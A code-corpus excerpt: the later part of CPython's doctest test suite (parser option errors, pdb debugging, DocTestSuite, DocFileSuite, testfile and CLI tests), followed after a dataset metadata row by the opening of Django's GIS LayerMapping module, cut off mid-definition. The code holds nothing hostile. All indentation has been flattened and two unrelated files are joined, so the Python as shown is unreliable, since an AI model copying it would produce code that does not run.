ValueError: line 1 of the doctest for s has an invalid option: '+BADOPTION'
>>> # Error: No + or - prefix
>>> s = '>>> print(12) #doctest: ELLIPSIS'
>>> test = doctest.DocTestParser().get_doctest(s, {}, 's', 's.py', 0)
Traceback (most recent call last):
ValueError: line 1 of the doctest for s has an invalid option: 'ELLIPSIS'
It is an error to use an option directive on a line that contains no
source:
>>> s = '>>> # doctest: +ELLIPSIS'
>>> test = doctest.DocTestParser().get_doctest(s, {}, 's', 's.py', 0)
Traceback (most recent call last):
ValueError: line 0 of the doctest for s has an option directive on a line with no example: '# doctest: +ELLIPSIS'
"""
def test_testsource(): r"""
Unit tests for `testsource()`.
The testsource() function takes a module and a name, finds the (first)
test with that name in that module, and converts it to a script. The
example code is converted to regular Python code. The surrounding
words and expected output are converted to comments:
>>> import test.test_doctest
>>> name = 'test.test_doctest.sample_func'
>>> print(doctest.testsource(test.test_doctest, name))
# Blah blah
#
print(sample_func(22))
# Expected:
## 44
#
# Yee ha!
<BLANKLINE>
>>> name = 'test.test_doctest.SampleNewStyleClass'
>>> print(doctest.testsource(test.test_doctest, name))
print('1\n2\n3')
# Expected:
## 1
## 2
## 3
<BLANKLINE>
>>> name = 'test.test_doctest.SampleClass.a_classmethod'
>>> print(doctest.testsource(test.test_doctest, name))
print(SampleClass.a_classmethod(10))
# Expected:
## 12
print(SampleClass(0).a_classmethod(10))
# Expected:
## 12
<BLANKLINE>
"""
def test_debug(): r"""
Create a docstring that we want to debug:
>>> s = '''
... >>> x = 12
... >>> print(x)
... 12
... '''
Create some fake stdin input, to feed to the debugger:
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput(['next', 'print(x)', 'continue'])
Run the debugger on the docstring, and then restore sys.stdin.
>>> try: doctest.debug_src(s)
... finally: sys.stdin = real_stdin
> <string>(1)<module>()
(Pdb) next
12
--Return--
> <string>(1)<module>()->None
(Pdb) print(x)
12
(Pdb) continue
"""
if not hasattr(sys, 'gettrace') or not sys.gettrace():
def test_pdb_set_trace():
"""Using pdb.set_trace from a doctest.
You can use pdb.set_trace from a doctest. To do so, you must
retrieve the set_trace function from the pdb module at the time
you use it. The doctest module changes sys.stdout so that it can
capture program output. It also temporarily replaces pdb.set_trace
with a version that restores stdout. This is necessary for you to
see debugger output.
>>> doc = '''
... >>> x = 42
... >>> raise Exception('clé')
... Traceback (most recent call last):
... Exception: clé
... >>> import pdb; pdb.set_trace()
... '''
>>> parser = doctest.DocTestParser()
>>> test = parser.get_doctest(doc, {}, "foo-bar@baz", "foo-bar@baz.py", 0)
>>> runner = doctest.DocTestRunner(verbose=False)
To demonstrate this, we'll create a fake standard input that
captures our debugger input:
>>> import tempfile
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput([
... 'print(x)', # print data defined by the example
... 'continue', # stop debugging
... ''])
>>> try: runner.run(test)
... finally: sys.stdin = real_stdin
--Return--
> <doctest foo-bar@baz[2]>(1)<module>()->None
-> import pdb; pdb.set_trace()
(Pdb) print(x)
42
(Pdb) continue
TestResults(failed=0, attempted=3)
You can also put pdb.set_trace in a function called from a test:
>>> def calls_set_trace():
... y=2
... import pdb; pdb.set_trace()
>>> doc = '''
... >>> x=1
... >>> calls_set_trace()
... '''
>>> test = parser.get_doctest(doc, globals(), "foo-bar@baz", "foo-bar@baz.py", 0)
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput([
... 'print(y)', # print data defined in the function
... 'up', # out of function
... 'print(x)', # print data defined by the example
... 'continue', # stop debugging
... ''])
>>> try:
... runner.run(test)
... finally:
... sys.stdin = real_stdin
--Return--
> <doctest test.test_doctest.test_pdb_set_trace[8]>(3)calls_set_trace()->None
-> import pdb; pdb.set_trace()
(Pdb) print(y)
2
(Pdb) up
> <doctest foo-bar@baz[1]>(1)<module>()
-> calls_set_trace()
(Pdb) print(x)
1
(Pdb) continue
TestResults(failed=0, attempted=2)
During interactive debugging, source code is shown, even for
doctest examples:
>>> doc = '''
... >>> def f(x):
... ... g(x*2)
... >>> def g(x):
... ... print(x+3)
... ... import pdb; pdb.set_trace()
... >>> f(3)
... '''
>>> test = parser.get_doctest(doc, globals(), "foo-bar@baz", "foo-bar@baz.py", 0)
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput([
... 'list', # list source from example 2
... 'next', # return from g()
... 'list', # list source from example 1
... 'next', # return from f()
... 'list', # list source from example 3
... 'continue', # stop debugging
... ''])
>>> try: runner.run(test)
... finally: sys.stdin = real_stdin
... # doctest: +NORMALIZE_WHITESPACE
--Return--
> <doctest foo-bar@baz[1]>(3)g()->None
-> import pdb; pdb.set_trace()
(Pdb) list
1 def g(x):
2 print(x+3)
3 -> import pdb; pdb.set_trace()
[EOF]
(Pdb) next
--Return--
> <doctest foo-bar@baz[0]>(2)f()->None
-> g(x*2)
(Pdb) list
1 def f(x):
2 -> g(x*2)
[EOF]
(Pdb) next
--Return--
> <doctest foo-bar@baz[2]>(1)<module>()->None
-> f(3)
(Pdb) list
1 -> f(3)
[EOF]
(Pdb) continue
**********************************************************************
File "foo-bar@baz.py", line 7, in foo-bar@baz
Failed example:
f(3)
Expected nothing
Got:
9
TestResults(failed=1, attempted=3)
"""
def test_pdb_set_trace_nested():
"""This illustrates more-demanding use of set_trace with nested functions.
>>> class C(object):
... def calls_set_trace(self):
... y = 1
... import pdb; pdb.set_trace()
... self.f1()
... y = 2
... def f1(self):
... x = 1
... self.f2()
... x = 2
... def f2(self):
... z = 1
... z = 2
>>> calls_set_trace = C().calls_set_trace
>>> doc = '''
... >>> a = 1
... >>> calls_set_trace()
... '''
>>> parser = doctest.DocTestParser()
>>> runner = doctest.DocTestRunner(verbose=False)
>>> test = parser.get_doctest(doc, globals(), "foo-bar@baz", "foo-bar@baz.py", 0)
>>> real_stdin = sys.stdin
>>> sys.stdin = _FakeInput([
... 'print(y)', # print data defined in the function
... 'step', 'step', 'step', 'step', 'step', 'step', 'print(z)',
... 'up', 'print(x)',
... 'up', 'print(y)',
... 'up', 'print(foo)',
... 'continue', # stop debugging
... ''])
>>> try:
... runner.run(test)
... finally:
... sys.stdin = real_stdin
... # doctest: +REPORT_NDIFF
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(5)calls_set_trace()
-> self.f1()
(Pdb) print(y)
1
(Pdb) step
--Call--
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(7)f1()
-> def f1(self):
(Pdb) step
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(8)f1()
-> x = 1
(Pdb) step
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(9)f1()
-> self.f2()
(Pdb) step
--Call--
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(11)f2()
-> def f2(self):
(Pdb) step
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(12)f2()
-> z = 1
(Pdb) step
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(13)f2()
-> z = 2
(Pdb) print(z)
1
(Pdb) up
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(9)f1()
-> self.f2()
(Pdb) print(x)
1
(Pdb) up
> <doctest test.test_doctest.test_pdb_set_trace_nested[0]>(5)calls_set_trace()
-> self.f1()
(Pdb) print(y)
1
(Pdb) up
> <doctest foo-bar@baz[1]>(1)<module>()
-> calls_set_trace()
(Pdb) print(foo)
*** NameError: name 'foo' is not defined
(Pdb) continue
TestResults(failed=0, attempted=2)
"""
def test_DocTestSuite():
"""DocTestSuite creates a unittest test suite from a doctest.
We create a Suite by providing a module. A module can be provided
by passing a module object:
>>> import unittest
>>> import test.sample_doctest
>>> suite = doctest.DocTestSuite(test.sample_doctest)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=4>
We can also supply the module by name:
>>> suite = doctest.DocTestSuite('test.sample_doctest')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=4>
The module need not contain any doctest examples:
>>> suite = doctest.DocTestSuite('test.sample_doctest_no_doctests')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=0 errors=0 failures=0>
However, if DocTestSuite finds no docstrings, it raises an error:
>>> try:
... doctest.DocTestSuite('test.sample_doctest_no_docstrings')
... except ValueError as e:
... error = e
>>> print(error.args[1])
has no docstrings
You can prevent this error by passing a DocTestFinder instance with
the `exclude_empty` keyword argument set to False:
>>> finder = doctest.DocTestFinder(exclude_empty=False)
>>> suite = doctest.DocTestSuite('test.sample_doctest_no_docstrings',
... test_finder=finder)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=0 errors=0 failures=0>
We can use the current module:
>>> suite = test.sample_doctest.test_suite()
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=4>
We can supply global variables. If we pass globs, they will be
used instead of the module globals. Here we'll pass an empty
globals, triggering an extra error:
>>> suite = doctest.DocTestSuite('test.sample_doctest', globs={})
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=5>
Alternatively, we can provide extra globals. Here we'll make an
error go away by providing an extra global variable:
>>> suite = doctest.DocTestSuite('test.sample_doctest',
... extraglobs={'y': 1})
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=3>
You can pass option flags. Here we'll cause an extra error
by disabling the blank-line feature:
>>> suite = doctest.DocTestSuite('test.sample_doctest',
... optionflags=doctest.DONT_ACCEPT_BLANKLINE)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=5>
You can supply setUp and tearDown functions:
>>> def setUp(t):
... import test.test_doctest
... test.test_doctest.sillySetup = True
>>> def tearDown(t):
... import test.test_doctest
... del test.test_doctest.sillySetup
Here, we installed a silly variable that the test expects:
>>> suite = doctest.DocTestSuite('test.sample_doctest',
... setUp=setUp, tearDown=tearDown)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=3>
But the tearDown restores sanity:
>>> import test.test_doctest
>>> test.test_doctest.sillySetup
Traceback (most recent call last):
...
AttributeError: 'module' object has no attribute 'sillySetup'
The setUp and tearDown funtions are passed test objects. Here
we'll use the setUp function to supply the missing variable y:
>>> def setUp(test):
... test.globs['y'] = 1
>>> suite = doctest.DocTestSuite('test.sample_doctest', setUp=setUp)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=9 errors=0 failures=3>
Here, we didn't need to use a tearDown function because we
modified the test globals, which are a copy of the
sample_doctest module dictionary. The test globals are
automatically cleared for us after a test.
"""
def test_DocFileSuite():
"""We can test tests found in text files using a DocFileSuite.
We create a suite by providing the names of one or more text
files that include examples:
>>> import unittest
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=2>
The test files are looked for in the directory containing the
calling module. A package keyword argument can be provided to
specify a different relative location.
>>> import unittest
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... package='test')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=2>
Support for using a package's __loader__.get_data() is also
provided.
>>> import unittest, pkgutil, test
>>> added_loader = False
>>> if not hasattr(test, '__loader__'):
... test.__loader__ = pkgutil.get_loader(test)
... added_loader = True
>>> try:
... suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... package='test')
... suite.run(unittest.TestResult())
... finally:
... if added_loader:
... del test.__loader__
<unittest.result.TestResult run=3 errors=0 failures=2>
'/' should be used as a path separator. It will be converted
to a native separator at run time:
>>> suite = doctest.DocFileSuite('../test/test_doctest.txt')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=1 errors=0 failures=1>
If DocFileSuite is used from an interactive session, then files
are resolved relative to the directory of sys.argv[0]:
>>> import types, os.path, test.test_doctest
>>> save_argv = sys.argv
>>> sys.argv = [test.test_doctest.__file__]
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... package=types.ModuleType('__main__'))
>>> sys.argv = save_argv
By setting `module_relative=False`, os-specific paths may be
used (including absolute paths and paths relative to the
working directory):
>>> # Get the absolute path of the test package.
>>> test_doctest_path = os.path.abspath(test.test_doctest.__file__)
>>> test_pkg_path = os.path.split(test_doctest_path)[0]
>>> # Use it to find the absolute path of test_doctest.txt.
>>> test_file = os.path.join(test_pkg_path, 'test_doctest.txt')
>>> suite = doctest.DocFileSuite(test_file, module_relative=False)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=1 errors=0 failures=1>
It is an error to specify `package` when `module_relative=False`:
>>> suite = doctest.DocFileSuite(test_file, module_relative=False,
... package='test')
Traceback (most recent call last):
ValueError: Package may only be specified for module-relative paths.
You can specify initial global variables:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... globs={'favorite_color': 'blue'})
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=1>
In this case, we supplied a missing favorite color. You can
provide doctest options:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... optionflags=doctest.DONT_ACCEPT_BLANKLINE,
... globs={'favorite_color': 'blue'})
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=2>
And, you can provide setUp and tearDown functions:
>>> def setUp(t):
... import test.test_doctest
... test.test_doctest.sillySetup = True
>>> def tearDown(t):
... import test.test_doctest
... del test.test_doctest.sillySetup
Here, we installed a silly variable that the test expects:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... setUp=setUp, tearDown=tearDown)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=1>
But the tearDown restores sanity:
>>> import test.test_doctest
>>> test.test_doctest.sillySetup
Traceback (most recent call last):
...
AttributeError: 'module' object has no attribute 'sillySetup'
The setUp and tearDown funtions are passed test objects.
Here, we'll use a setUp function to set the favorite color in
test_doctest.txt:
>>> def setUp(test):
... test.globs['favorite_color'] = 'blue'
>>> suite = doctest.DocFileSuite('test_doctest.txt', setUp=setUp)
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=1 errors=0 failures=0>
Here, we didn't need to use a tearDown function because we
modified the test globals. The test globals are
automatically cleared for us after a test.
Tests in a file run using `DocFileSuite` can also access the
`__file__` global, which is set to the name of the file
containing the tests:
>>> suite = doctest.DocFileSuite('test_doctest3.txt')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=1 errors=0 failures=0>
If the tests contain non-ASCII characters, we have to specify which
encoding the file is encoded with. We do so by using the `encoding`
parameter:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... 'test_doctest2.txt',
... 'test_doctest4.txt',
... encoding='utf-8')
>>> suite.run(unittest.TestResult())
<unittest.result.TestResult run=3 errors=0 failures=2>
"""
def test_trailing_space_in_test():
"""
Trailing spaces in expected output are significant:
>>> x, y = 'foo', ''
>>> print(x, y)
foo \n
"""
def test_unittest_reportflags():
"""Default unittest reporting flags can be set to control reporting
Here, we'll set the REPORT_ONLY_FIRST_FAILURE option so we see
only the first failure of each test. First, we'll look at the
output without the flag. The file test_doctest.txt file has two
tests. They both fail if blank lines are disabled:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... optionflags=doctest.DONT_ACCEPT_BLANKLINE)
>>> import unittest
>>> result = suite.run(unittest.TestResult())
>>> print(result.failures[0][1]) # doctest: +ELLIPSIS
Traceback ...
Failed example:
favorite_color
...
Failed example:
if 1:
...
Note that we see both failures displayed.
>>> old = doctest.set_unittest_reportflags(
... doctest.REPORT_ONLY_FIRST_FAILURE)
Now, when we run the test:
>>> result = suite.run(unittest.TestResult())
>>> print(result.failures[0][1]) # doctest: +ELLIPSIS
Traceback ...
Failed example:
favorite_color
Exception raised:
...
NameError: name 'favorite_color' is not defined
<BLANKLINE>
<BLANKLINE>
We get only the first failure.
If we give any reporting options when we set up the tests,
however:
>>> suite = doctest.DocFileSuite('test_doctest.txt',
... optionflags=doctest.DONT_ACCEPT_BLANKLINE | doctest.REPORT_NDIFF)
Then the default eporting options are ignored:
>>> result = suite.run(unittest.TestResult())
>>> print(result.failures[0][1]) # doctest: +ELLIPSIS
Traceback ...
Failed example:
favorite_color
...
Failed example:
if 1:
print('a')
print()
print('b')
Differences (ndiff with -expected +actual):
a
- <BLANKLINE>
+
b
<BLANKLINE>
<BLANKLINE>
Test runners can restore the formatting flags after they run:
>>> ignored = doctest.set_unittest_reportflags(old)
"""
def test_testfile(): r"""
Tests for the `testfile()` function. This function runs all the
doctest examples in a given file. In its simple invokation, it is
called with the name of a file, which is taken to be relative to the
calling module. The return value is (#failures, #tests).
We don't want `-v` in sys.argv for these tests.
>>> save_argv = sys.argv
>>> if '-v' in sys.argv:
... sys.argv = [arg for arg in save_argv if arg != '-v']
>>> doctest.testfile('test_doctest.txt') # doctest: +ELLIPSIS
**********************************************************************
File "...", line 6, in test_doctest.txt
Failed example:
favorite_color
Exception raised:
...
NameError: name 'favorite_color' is not defined
**********************************************************************
1 items had failures:
1 of 2 in test_doctest.txt
***Test Failed*** 1 failures.
TestResults(failed=1, attempted=2)
>>> doctest.master = None # Reset master.
(Note: we'll be clearing doctest.master after each call to
`doctest.testfile`, to suppress warnings about multiple tests with the
same name.)
Globals may be specified with the `globs` and `extraglobs` parameters:
>>> globs = {'favorite_color': 'blue'}
>>> doctest.testfile('test_doctest.txt', globs=globs)
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
>>> extraglobs = {'favorite_color': 'red'}
>>> doctest.testfile('test_doctest.txt', globs=globs,
... extraglobs=extraglobs) # doctest: +ELLIPSIS
**********************************************************************
File "...", line 6, in test_doctest.txt
Failed example:
favorite_color
Expected:
'blue'
Got:
'red'
**********************************************************************
1 items had failures:
1 of 2 in test_doctest.txt
***Test Failed*** 1 failures.
TestResults(failed=1, attempted=2)
>>> doctest.master = None # Reset master.
The file may be made relative to a given module or package, using the
optional `module_relative` parameter:
>>> doctest.testfile('test_doctest.txt', globs=globs,
... module_relative='test')
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
Verbosity can be increased with the optional `verbose` parameter:
>>> doctest.testfile('test_doctest.txt', globs=globs, verbose=True)
Trying:
favorite_color
Expecting:
'blue'
ok
Trying:
if 1:
print('a')
print()
print('b')
Expecting:
a
<BLANKLINE>
b
ok
1 items passed all tests:
2 tests in test_doctest.txt
2 tests in 1 items.
2 passed and 0 failed.
Test passed.
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
The name of the test may be specified with the optional `name`
parameter:
>>> doctest.testfile('test_doctest.txt', name='newname')
... # doctest: +ELLIPSIS
**********************************************************************
File "...", line 6, in newname
...
TestResults(failed=1, attempted=2)
>>> doctest.master = None # Reset master.
The summary report may be suppressed with the optional `report`
parameter:
>>> doctest.testfile('test_doctest.txt', report=False)
... # doctest: +ELLIPSIS
**********************************************************************
File "...", line 6, in test_doctest.txt
Failed example:
favorite_color
Exception raised:
...
NameError: name 'favorite_color' is not defined
TestResults(failed=1, attempted=2)
>>> doctest.master = None # Reset master.
The optional keyword argument `raise_on_error` can be used to raise an
exception on the first error (which may be useful for postmortem
debugging):
>>> doctest.testfile('test_doctest.txt', raise_on_error=True)
... # doctest: +ELLIPSIS
Traceback (most recent call last):
doctest.UnexpectedException: ...
>>> doctest.master = None # Reset master.
If the tests contain non-ASCII characters, the tests might fail, since
it's unknown which encoding is used. The encoding can be specified
using the optional keyword argument `encoding`:
>>> doctest.testfile('test_doctest4.txt', encoding='latin-1') # doctest: +ELLIPSIS
**********************************************************************
File "...", line 7, in test_doctest4.txt
Failed example:
'...'
Expected:
'f\xf6\xf6'
Got:
'f\xc3\xb6\xc3\xb6'
**********************************************************************
...
**********************************************************************
1 items had failures:
2 of 2 in test_doctest4.txt
***Test Failed*** 2 failures.
TestResults(failed=2, attempted=2)
>>> doctest.master = None # Reset master.
>>> doctest.testfile('test_doctest4.txt', encoding='utf-8')
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
Test the verbose output:
>>> doctest.testfile('test_doctest4.txt', encoding='utf-8', verbose=True)
Trying:
'föö'
Expecting:
'f\xf6\xf6'
ok
Trying:
'bąr'
Expecting:
'b\u0105r'
ok
1 items passed all tests:
2 tests in test_doctest4.txt
2 tests in 1 items.
2 passed and 0 failed.
Test passed.
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
>>> sys.argv = save_argv
"""
def test_testmod(): r"""
Tests for the testmod function. More might be useful, but for now we're just
testing the case raised by Issue 6195, where trying to doctest a C module would
fail with a UnicodeDecodeError because doctest tried to read the "source" lines
out of the binary module.
>>> import unicodedata
>>> doctest.testmod(unicodedata, verbose=False)
TestResults(failed=0, attempted=0)
"""
try:
os.fsencode("foo-bär@baz.py")
except UnicodeEncodeError:
# Skip the test: the filesystem encoding is unable to encode the filename
pass
else:
def test_unicode(): """
Check doctest with a non-ascii filename:
>>> doc = '''
... >>> raise Exception('clé')
... '''
...
>>> parser = doctest.DocTestParser()
>>> test = parser.get_doctest(doc, {}, "foo-bär@baz", "foo-bär@baz.py", 0)
>>> test
<DocTest foo-bär@baz from foo-bär@baz.py:0 (1 example)>
>>> runner = doctest.DocTestRunner(verbose=False)
>>> runner.run(test) # doctest: +ELLIPSIS
**********************************************************************
File "foo-bär@baz.py", line 2, in foo-bär@baz
Failed example:
raise Exception('clé')
Exception raised:
Traceback (most recent call last):
File ...
compileflags, 1), test.globs)
File "<doctest foo-bär@baz[0]>", line 1, in <module>
raise Exception('clé')
Exception: clé
TestResults(failed=1, attempted=1)
"""
def test_CLI(): r"""
The doctest module can be used to run doctests against an arbitrary file.
These tests test this CLI functionality.
We'll use the support module's script_helpers for this, and write a test files
to a temp dir to run the command against. Due to a current limitation in
script_helpers, though, we need a little utility function to turn the returned
output into something we can doctest against:
>>> def normalize(s):
... return '\n'.join(s.decode().splitlines())
Note: we also pass TERM='' to all the assert_python calls to avoid a bug
in the readline library that is triggered in these tests because we are
running them in a new python process. See:
http://lists.gnu.org/archive/html/bug-readline/2013-06/msg00000.html
With those preliminaries out of the way, we'll start with a file with two
simple tests and no errors. We'll run both the unadorned doctest command, and
the verbose version, and then check the output:
>>> from test import script_helper
>>> with script_helper.temp_dir() as tmpdir:
... fn = os.path.join(tmpdir, 'myfile.doc')
... with open(fn, 'w') as f:
... _ = f.write('This is a very simple test file.\n')
... _ = f.write(' >>> 1 + 1\n')
... _ = f.write(' 2\n')
... _ = f.write(' >>> "a"\n')
... _ = f.write(" 'a'\n")
... _ = f.write('\n')
... _ = f.write('And that is it.\n')
... rc1, out1, err1 = script_helper.assert_python_ok(
... '-m', 'doctest', fn, TERM='')
... rc2, out2, err2 = script_helper.assert_python_ok(
... '-m', 'doctest', '-v', fn, TERM='')
With no arguments and passing tests, we should get no output:
>>> rc1, out1, err1
(0, b'', b'')
With the verbose flag, we should see the test output, but no error output:
>>> rc2, err2
(0, b'')
>>> print(normalize(out2))
Trying:
1 + 1
Expecting:
2
ok
Trying:
"a"
Expecting:
'a'
ok
1 items passed all tests:
2 tests in myfile.doc
2 tests in 1 items.
2 passed and 0 failed.
Test passed.
Now we'll write a couple files, one with three tests, the other a python module
with two tests, both of the files having "errors" in the tests that can be made
non-errors by applying the appropriate doctest options to the run (ELLIPSIS in
the first file, NORMALIZE_WHITESPACE in the second). This combination will
allow to thoroughly test the -f and -o flags, as well as the doctest command's
ability to process more than one file on the command line and, since the second
file ends in '.py', its handling of python module files (as opposed to straight
text files).
>>> from test import script_helper
>>> with script_helper.temp_dir() as tmpdir:
... fn = os.path.join(tmpdir, 'myfile.doc')
... with open(fn, 'w') as f:
... _ = f.write('This is another simple test file.\n')
... _ = f.write(' >>> 1 + 1\n')
... _ = f.write(' 2\n')
... _ = f.write(' >>> "abcdef"\n')
... _ = f.write(" 'a...f'\n")
... _ = f.write(' >>> "ajkml"\n')
... _ = f.write(" 'a...l'\n")
... _ = f.write('\n')
... _ = f.write('And that is it.\n')
... fn2 = os.path.join(tmpdir, 'myfile2.py')
... with open(fn2, 'w') as f:
... _ = f.write('def test_func():\n')
... _ = f.write(' \"\"\"\n')
... _ = f.write(' This is simple python test function.\n')
... _ = f.write(' >>> 1 + 1\n')
... _ = f.write(' 2\n')
... _ = f.write(' >>> "abc def"\n')
... _ = f.write(" 'abc def'\n")
... _ = f.write("\n")
... _ = f.write(' \"\"\"\n')
... import shutil
... rc1, out1, err1 = script_helper.assert_python_failure(
... '-m', 'doctest', fn, fn2, TERM='')
... rc2, out2, err2 = script_helper.assert_python_ok(
... '-m', 'doctest', '-o', 'ELLIPSIS', fn, TERM='')
... rc3, out3, err3 = script_helper.assert_python_ok(
... '-m', 'doctest', '-o', 'ELLIPSIS',
... '-o', 'NORMALIZE_WHITESPACE', fn, fn2, TERM='')
... rc4, out4, err4 = script_helper.assert_python_failure(
... '-m', 'doctest', '-f', fn, fn2, TERM='')
... rc5, out5, err5 = script_helper.assert_python_ok(
... '-m', 'doctest', '-v', '-o', 'ELLIPSIS',
... '-o', 'NORMALIZE_WHITESPACE', fn, fn2, TERM='')
Our first test run will show the errors from the first file (doctest stops if a
file has errors). Note that doctest test-run error output appears on stdout,
not stderr:
>>> rc1, err1
(1, b'')
>>> print(normalize(out1)) # doctest: +ELLIPSIS
**********************************************************************
File "...myfile.doc", line 4, in myfile.doc
Failed example:
"abcdef"
Expected:
'a...f'
Got:
'abcdef'
**********************************************************************
File "...myfile.doc", line 6, in myfile.doc
Failed example:
"ajkml"
Expected:
'a...l'
Got:
'ajkml'
**********************************************************************
1 items had failures:
2 of 3 in myfile.doc
***Test Failed*** 2 failures.
With -o ELLIPSIS specified, the second run, against just the first file, should
produce no errors, and with -o NORMALIZE_WHITESPACE also specified, neither
should the third, which ran against both files:
>>> rc2, out2, err2
(0, b'', b'')
>>> rc3, out3, err3
(0, b'', b'')
The fourth run uses FAIL_FAST, so we should see only one error:
>>> rc4, err4
(1, b'')
>>> print(normalize(out4)) # doctest: +ELLIPSIS
**********************************************************************
File "...myfile.doc", line 4, in myfile.doc
Failed example:
"abcdef"
Expected:
'a...f'
Got:
'abcdef'
**********************************************************************
1 items had failures:
1 of 2 in myfile.doc
***Test Failed*** 1 failures.
The fifth test uses verbose with the two options, so we should get verbose
success output for the tests in both files:
>>> rc5, err5
(0, b'')
>>> print(normalize(out5))
Trying:
1 + 1
Expecting:
2
ok
Trying:
"abcdef"
Expecting:
'a...f'
ok
Trying:
"ajkml"
Expecting:
'a...l'
ok
1 items passed all tests:
3 tests in myfile.doc
3 tests in 1 items.
3 passed and 0 failed.
Test passed.
Trying:
1 + 1
Expecting:
2
ok
Trying:
"abc def"
Expecting:
'abc def'
ok
1 items had no tests:
myfile2
1 items passed all tests:
2 tests in myfile2.test_func
2 tests in 2 items.
2 passed and 0 failed.
Test passed.
We should also check some typical error cases.
Invalid file name:
>>> rc, out, err = script_helper.assert_python_failure(
... '-m', 'doctest', 'nosuchfile', TERM='')
>>> rc, out
(1, b'')
>>> print(normalize(err)) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
FileNotFoundError: [Errno ...] No such file or directory: 'nosuchfile'
Invalid doctest option:
>>> rc, out, err = script_helper.assert_python_failure(
... '-m', 'doctest', '-o', 'nosuchoption', TERM='')
>>> rc, out
(2, b'')
>>> print(normalize(err)) # doctest: +ELLIPSIS
usage...invalid...nosuchoption...
"""
######################################################################
## Main
######################################################################
def test_main():
# Check the doctest cases in doctest itself:
support.run_doctest(doctest, verbosity=True)
# Check the doctest cases defined here:
from test import test_doctest
support.run_doctest(test_doctest, verbosity=True)
import sys, re, io
def test_coverage(coverdir):
trace = support.import_module('trace')
tracer = trace.Trace(ignoredirs=[sys.base_prefix, sys.base_exec_prefix,],
trace=0, count=1)
tracer.run('test_main()')
r = tracer.results()
print('Writing coverage results...')
r.write_results(show_missing=True, summary=True,
coverdir=coverdir)
if __name__ == '__main__':
if '-c' in sys.argv:
test_coverage('/tmp/doctest.cover')
else:
test_main()
| gpl-2.0 |
nzavagli/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/django-1.8.2/django/contrib/gis/utils/layermapping.py | 61 | 27288 | # LayerMapping -- A Django Model/OGR Layer Mapping Utility
"""
The LayerMapping class provides a way to map the contents of OGR
vector files (e.g. SHP files) to Geographic-enabled Django models.
For more information, please consult the GeoDjango documentation:
https://docs.djangoproject.com/en/dev/ref/contrib/gis/layermapping/
"""
import sys
from decimal import Decimal, InvalidOperation as DecimalInvalidOperation
from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.gdal import (
CoordTransform, DataSource, GDALException, OGRGeometry, OGRGeomType,
SpatialReference,
)
from django.contrib.gis.gdal.field import (
OFTDate, OFTDateTime, OFTInteger, OFTReal, OFTString, OFTTime,
)
from django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist
from django.db import connections, models, router, transaction
from django.utils import six
from django.utils.encoding import force_text
# LayerMapping exceptions.
class LayerMapError(Exception):
pass
class InvalidString(LayerMapError):
pass
class InvalidDecimal(LayerMapError):
pass
class InvalidInteger(LayerMapError):
pass
class MissingForeignKey(LayerMapError):
pass
class LayerMapping(object):
"A class that maps OGR Layers to GeoDjango Models."
# Acceptable 'base' types for a multi-geometry type.
MULTI_TYPES = {1: OGRGeomType('MultiPoint'),
2: OGRGeomType('MultiLineString'),
3: OGRGeomType('MultiPolygon'),
OGRGeomType('Point25D').num: OGRGeomType('MultiPoint25D'),
OGRGeomType('LineString25D').num: OGRGeomType('MultiLineString25D'),
